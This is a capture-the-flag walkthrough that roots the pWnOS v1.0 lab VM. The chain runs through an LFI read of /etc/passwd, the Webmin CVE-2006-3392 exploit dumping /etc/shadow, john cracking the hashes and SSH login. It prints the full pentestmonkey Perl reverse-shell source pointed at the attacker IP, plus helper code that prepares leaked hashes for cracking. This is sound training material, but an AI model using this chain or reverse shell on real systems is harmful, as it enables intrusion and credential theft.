pWnOSv1.0

Host discovery

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:33 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00017s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.133
Host is up (0.00072s latency).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.98 seconds

Port scan

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.133 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:33 EDT
Nmap scan report for 10.10.10.133
Host is up (0.0012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445,10000 10.10.10.133 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:34 EDT
Nmap scan report for 10.10.10.133
Host is up (0.00042s latency).

PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
|   1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_  2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 00:0C:29:5E:18:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM), Linux 2.6.22 - 2.6.23
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h30m01s, deviation: 3h32m07s, median: 1s
|_nbstat: NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   NetBIOS computer name:
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|_  System time: 2023-07-24T06:34:54-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.74 seconds

UDP

└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.10.133 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:53 EDT
Warning: 10.10.10.133 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.133
Host is up (0.0015s latency).
Not shown: 65455 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
137/udp   open  netbios-ns
10000/udp open  ndmp
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.77 seconds

Nmap vulnerability scan

└─$ sudo nmap --script=vuln -p22,80,139,445,10000 10.10.10.133 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 07:36 EDT

PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|   /icons/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|   /index/: Potentially interesting folder
|_  /php/: Potentially interesting directory w/ listing on 'apache/2.2.4 (ubuntu) php/5.2.3-1ubuntu6'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
| http-vuln-cve2006-3392:
|   VULNERABLE:
|   Webmin File Disclosure
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2006-3392
|       Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML.
|       This allows arbitrary files to be read, without requiring authentication, using "..%01" sequences
|       to bypass the removal of "../" directory traversal sequences.
|
|     Disclosure date: 2006-06-29
|     References:
|       http://www.exploit-db.com/exploits/1997/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3392
|_      http://www.rapid7.com/db/modules/auxiliary/admin/webmin/file_disclosure
MAC Address: 00:0C:29:5E:18:C9 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Nmap done: 1 IP address (1 host up) scanned in 344.74 seconds
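The http-vuln-cve2006-3392 finding above names the root cause: Webmin ran its path normaliser (simplify_path) before decoding the URL, so a traversal that only appears after decoding was never removed. The Python below is an added model of that ordering bug, not Webmin's miniserv code. It uses plain percent-encoded dots (%2e%2e) so the model stays self-contained; the real exploit relies on Webmin-specific handling of ..%01 sequences that this model does not reproduce. The document root is assumed.

```python
from posixpath import normpath
from urllib.parse import unquote

WEB_ROOT = "/usr/share/webmin"   # assumed document root for the model


class BogusPath(ValueError):
    """Raised when a path tries to climb above the document root."""


def simplify_path(path):
    """Collapse '.' and '..' components the way a server-side normaliser does."""
    fixed = []
    for part in path.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not fixed:
                raise BogusPath(path)
            fixed.pop()
        else:
            fixed.append(part)
    return "/" + "/".join(fixed)


def resolve_vulnerable(url_path):
    """Normalise first, decode second: a component that only becomes '..' after
    decoding is never seen by simplify_path (the ordering CVE-2006-3392 describes)."""
    return WEB_ROOT + unquote(simplify_path(url_path))


def resolve_fixed(url_path):
    """Decode everything the client could have encoded, then normalise."""
    return WEB_ROOT + simplify_path(unquote(url_path))


def escapes_root(full_path):
    """Would the path the server finally opens lie outside WEB_ROOT?"""
    return not normpath(full_path).startswith(WEB_ROOT + "/")


def rejected(resolver, url_path):
    """True when the resolver refuses the request instead of producing a path."""
    try:
        resolver(url_path)
    except BogusPath:
        return True
    return False


if __name__ == "__main__":
    payload = "/unauthenticated/" + "%2e%2e/" * 6 + "etc/shadow"
    print("vulnerable order opens:", normpath(resolve_vulnerable(payload)))
    print("fixed order rejects   :", rejected(resolve_fixed, payload))
```

With the vulnerable order the request for /unauthenticated/%2e%2e/.../etc/shadow passes the normaliser untouched and is opened as /etc/shadow after decoding; with the fixed order the same request is refused as soon as the decoded "..' components try to leave the root. The general remedy is the one the fixed function shows: decode first, then normalise, then check the final absolute path against the root.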

Attack path

Web exploitation

Directory brute force

└─$ sudo gobuster dir -u http://10.10.10.133 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.133
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 07:37:03 Starting gobuster in directory enumeration mode
===============================================================
/php                  (Status: 301) [Size: 328] [--> http://10.10.10.133/php/]
/index                (Status: 200) [Size: 295]
/server-status        (Status: 403) [Size: 311]
/index2               (Status: 200) [Size: 156]
/index1               (Status: 200) [Size: 1104]
===============================================================
2023/07/24 07:37:16 Finished
===============================================================

Several pages turn up. Requesting index1.php directly produces a file-inclusion error.

The error points to a missing parameter. Clicking Next on the index page makes the error disappear, and the URL becomes

http://10.10.10.133/index1.php?help=true&connect=true

To find out which of the two parameters is the one being included, replace each value in turn with /etc/passwd:

└─$ curl 'http://10.10.10.133/index1.php?help=true&connect=/etc/passwd'
<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>

<p>This is the official help page. If you're too big of a n00b to figure this out, enter your information below for a small hint. :)</p>

<form name="form" method="GET" action="index2.php">
<table border=1>
<tr><td width=175>
Name:
</td>
<td width=175>
<input type = "text" name="name" size=25>
</td>
<td> </td>
<td> </td>
</tr>
<tr>
<td>
Skillz:
</td>
<td width=175><input type = "radio" name = "level" value="n00b">n00b</td>
<td width=175><input type = "radio" name = "level" value="sk1ll3d n00b">sk1ll3d n00b</td>
<td width=175><input type = "radio" name = "level" value = "l33t hax0r">l33t hax0r</td>
</tr>
<tr><td width=175>
<input type = "submit" name = "submit" value = "Please Help!">
</td>
<td> </td>
<td> </td>
<td> </td>
</tr>

</table>
</form>

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash

</body>
</HTML>

connect is the inclusion parameter. Reading /etc/shadow the same way fails, as expected: the include runs as www-data (uid 33 in the listing above), and /etc/shadow is readable only by root and the shadow group.

Next, port 10000.

Nmap already fingerprinted it as Webmin (MiniServ); search for known exploits:

└─$ searchsploit webmin
----------------------------------------------------------------- ---------------------------------
 Exploit Title                                                   |  Path
----------------------------------------------------------------- ---------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal  | cgi/webapps/23535.txt
phpMyWebmin 1.0 - 'target' Remote File Inclusion                 | php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion             | php/webapps/2451.txt
Webmin - Brute Force / Command Execution                         | multiple/remote/705.pl
webmin 0.91 - Directory Traversal                                | cgi/remote/21183.txt
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing      | linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                          | linux/remote/21765.pl
Webmin 0.x - Code Input Validation                               | linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                     | multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                               | multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasp | unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                          | cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)             | cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metas | linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                             | linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit | linux/remote/47230.rb
Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)  | linux/webapps/49318.rb
Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)       | linux/webapps/50144.py
Webmin 1.973 - 'save_user.cgi' Cross-Site Request Forgery (CSRF) | linux/webapps/50126.py
Webmin 1.984 - Remote Code Execution (Authenticated)             | linux/webapps/50809.py
Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)       | linux/webapps/50998.py
Webmin 1.x - HTML Email Command Execution                        | cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure     | multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure     | multiple/remote/2017.pl
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Metasploit)    | linux/webapps/47330.rb
----------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
└─$ searchsploit webmin -m 2017
[!] Could not find EDB-ID #

  Exploit: Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/2017
     Path: /usr/share/exploitdb/exploits/multiple/remote/2017.pl
    Codes: CVE-2006-3392
 Verified: True
File Type: Perl script text executable
Copied to: /home/kali/Desktop/pWnOSv1.0/2017.pl

Usage:

Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

Read /etc/shadow through the Webmin file disclosure (CVE-2006-3392). No authentication is needed, and because MiniServ runs as root the read is not limited by file permissions:

└─$ perl 2017.pl 10.10.10.133 10000 /etc/shadow 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.133 on port 10000!
FILENAME:  /etc/shadow

 FILE CONTENT STARTED
 -----------------------------------
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
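
The two leaks above (passwd through the LFI, shadow through Webmin) are what an unshadow step would combine before cracking. The Python below is an added example, not part of the original writeup: it recognises passwd rows inside an arbitrary HTML response (the same signature an LFI probe uses to confirm a hit), drops the locked shadow entries, names the hashing scheme from the $n$ prefix, and emits unshadow(8)-style lines for the accounts that both have a real shell and a crackable hash. The sample input is constructed from the rows shown above.

```python
import re

# Constructed sample input, copied from the two leaks above: the HTML page that
# index1.php returned with /etc/passwd included, and the /etc/shadow rows that
# the Webmin exploit printed. Trimmed to the rows that matter for the analysis.
PASSWD_HTML = """<HTML>
<body>
<center><h1>Welcome to the pWnOS homepage!
</h1></center>
Name:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
</body>
</HTML>"""

SHADOW_TEXT = """root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::"""

# A passwd row is seven colon-separated fields with a numeric uid and gid; this
# is also the signature that tells an LFI probe it really hit /etc/passwd.
PASSWD_ROW = re.compile(
    r"^([a-z_][a-z0-9_-]*):([^:\n]*):(\d+):(\d+):([^:\n]*):([^:\n]*):([^:\n]*)$", re.M)

CRYPT_SCHEMES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt",
                 "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
NO_LOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def extract_passwd(body):
    """Return passwd rows found anywhere in a response body; HTML around them is ignored."""
    return [m.groups() for m in PASSWD_ROW.finditer(body)]


def lfi_hit(body):
    """True when a response contains the root row, i.e. the include of /etc/passwd worked."""
    return any(name == "root" and uid == "0" for name, _, uid, *_ in extract_passwd(body))


def parse_shadow(text):
    """Map user -> second field of /etc/shadow (a hash, '*' or '!')."""
    return {f[0]: f[1] for f in (line.split(":") for line in text.splitlines()) if len(f) >= 2}


def crackable(shadow):
    """Drop locked or disabled entries and name the hashing scheme of the rest."""
    out = {}
    for user, h in shadow.items():
        if not h or h[0] in "*!":
            continue
        scheme = next((n for p, n in CRYPT_SCHEMES.items() if h.startswith(p)), "descrypt/unknown")
        out[user] = (h, scheme)
    return out


def targets(rows, shadow):
    """Accounts with a real shell and a crackable hash: worth cracking and trying over SSH."""
    hashes = crackable(shadow)
    return [name for name, *_, shell in rows if shell not in NO_LOGIN_SHELLS and name in hashes]


def john_input(rows, shadow):
    """unshadow(8)-style lines (hash in field two) for the target accounts only."""
    hashes = crackable(shadow)
    wanted = set(targets(rows, shadow))
    return [":".join((name, hashes[name][0], uid, gid, gecos, home, shell))
            for name, _, uid, gid, gecos, home, shell in rows if name in wanted]


if __name__ == "__main__":
    rows = extract_passwd(PASSWD_HTML)
    shadow = parse_shadow(SHADOW_TEXT)
    print("LFI hit:", lfi_hit(PASSWD_HTML))
    for line in john_input(rows, shadow):
        print(line)
```

Writing the john_input lines to a file and pointing john at it reproduces the five-hash session below; keeping the uid, gecos and home fields lets john's single-crack mode use them as password candidates, which the bare hash list would not.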

That yields five usable hashes (md5crypt, $1$ prefix); the accounts whose second field is * or ! are locked and can be skipped. Save the five lines to shadow.hash and run john:

└─$ john shadow.hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 5 password hashes with 5 different salts (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
h4ckm3           (vmware)
1g 0:00:07:47 DONE (2023-07-24 08:43) 0.002139g/s 30166p/s 136920c/s 136920C/s  ejngyhga007..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Try the cracked password over SSH. The target's OpenSSH 4.6 offers only DSA and SHA-1 RSA host keys, which current OpenSSH clients refuse by default, so they have to be re-enabled for this connection:

└─$ ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss vmware@10.10.10.133
The authenticity of host '10.10.10.133 (10.10.10.133)' can't be established.
RSA key fingerprint is SHA256:+C7UA7dQ1B/8zVWHRBD7KeNNfjuSBrtQBMZGd6qoR9w.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.133' (RSA) to the list of known hosts.
vmware@10.10.10.133's password:
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Fri Jun 20 14:35:37 2008
vmware@ubuntuvm:~$

Reverse shell through Perl CGI

Build the shell from the pentestmonkey Perl reverse-shell template:

└─$ cp /usr/share/webshells/perl/perl-reverse-shell.pl shell.cgi

┌──(kali㉿kali)-[~/Desktop/pWnOSv1.0]
└─$ cat shell.cgi
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
# Copyright (C) 2006 pentestmonkey@pentestmonkey.net
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  The author accepts no liability
# for damage caused by this tool.  If these terms are not acceptable to you, then
# do not use this tool.
#
# In all other respects the GPL version 2 applies:
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# This tool may be used for legal purposes only.  Users take full responsibility
# for any actions performed using this tool.  If these terms are not acceptable to
# you, then do not use this tool.
#
# You are encouraged to send comments, improvements or suggestions to
# me at pentestmonkey@pentestmonkey.net
#
# Description
# -----------
# This script will make an outbound TCP connection to a hardcoded IP and port.
# The recipient will be given a shell running as the current user (apache normally).
#

use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell.  Change these.
my $ip = '127.0.0.1';
my $port = 1234;

# Options
my $daemon = 1;
my $auth   = 0; # 0 means authentication is disabled and any
                # source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
        cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

        if ($auth) {
                unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
                        cgiprint("ERROR: Your client isn't authorised to view this page");
                        cgiexit();
                }
        }
} elsif ($auth) {
        cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address.  Denying access");
        cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
        my $pid = fork();
        if ($pid) {
                cgiexit(0); # parent exits
        }

        setsid();
        chdir('/');
        umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
        cgiprint("Sent reverse shell to $ip:$port");
        cgiprintpage();
} else {
        cgiprint("Couldn't open reverse shell to $ip:$port: $!");
        cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
        my $line = shift;
        $line .= "<p>\n";
        $global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
        cgiprintpage();
        exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
        print "Content-Length: " . length($global_page) . "\r
Connection: close\r
Content-Type: text\/html\r\n\r\n" . $global_page;
}

Change the default IP and port to the attacking host and to the port the nc listener will use (1234):

# Where to send the reverse shell.  Change these.
my $ip = '10.10.10.128';
my $port = 1234;

Upload shell.cgi to the target over the vmware SSH session:

└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.133 - - [24/Jul/2023 08:52:47] "GET /shell.cgi HTTP/1.0" 200 -
vmware@ubuntuvm:~$ cd /tmp/
vmware@ubuntuvm:/tmp$ wget http://10.10.10.128/shell.cgi
--07:52:49--  http://10.10.10.128/shell.cgi
           => `shell.cgi'
Connecting to 10.10.10.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,714 (3.6K) [application/octet-stream]

100%[========================================================>] 3,714         --.--K/s

07:52:49 (770.83 MB/s) - `shell.cgi' saved [3714/3714]

vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
vmware@ubuntuvm:/tmp$

Request the uploaded shell.cgi through the same Webmin exploit. This time the traversal does not return the file's contents: MiniServ treats any path ending in .cgi as a CGI program and executes it, and since MiniServ runs as root the reverse shell connects back with uid 0. Start the listener before sending the request:

└─$ perl 2017.pl 10.10.10.133 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 10.10.10.133 on port 10000!
FILENAME:  /tmp/shell.cgi

 FILE CONTENT STARTED
 -----------------------------------
Browser IP address appears to be: 10.10.10.128<p>

 -------------------------------------
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.133] 43094
 07:58:13 up  1:25,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
vmware   pts/0    10.10.10.128     07:45   18.00s  0.04s  0.04s -bash
Linux ubuntuvm 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux
uid=0(root) gid=0(root)
/
/usr/sbin/apache: can't access tty; job control turned off
# python -c "import pty;pty.spawn('/bin/bash')";
root@ubuntuvm:/#

Root shell obtained.
